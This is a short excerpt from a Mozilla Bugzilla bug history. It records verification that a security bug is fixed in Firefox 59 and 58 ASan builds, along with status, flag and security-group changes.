This issue is verified fixed using Firefox 59.0a1 (BuildId:20180119101109) and Firefox 58.0 (BuildId:20180118032629) asan builds on Ubuntu 16.04 64bit.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Updated • 8 years ago
Group: layout-core-security → core-security-release
Updated • 8 years ago
Group: core-security-release
Updated • 7 years ago
Updated • 1 year ago
Keywords: reporter-external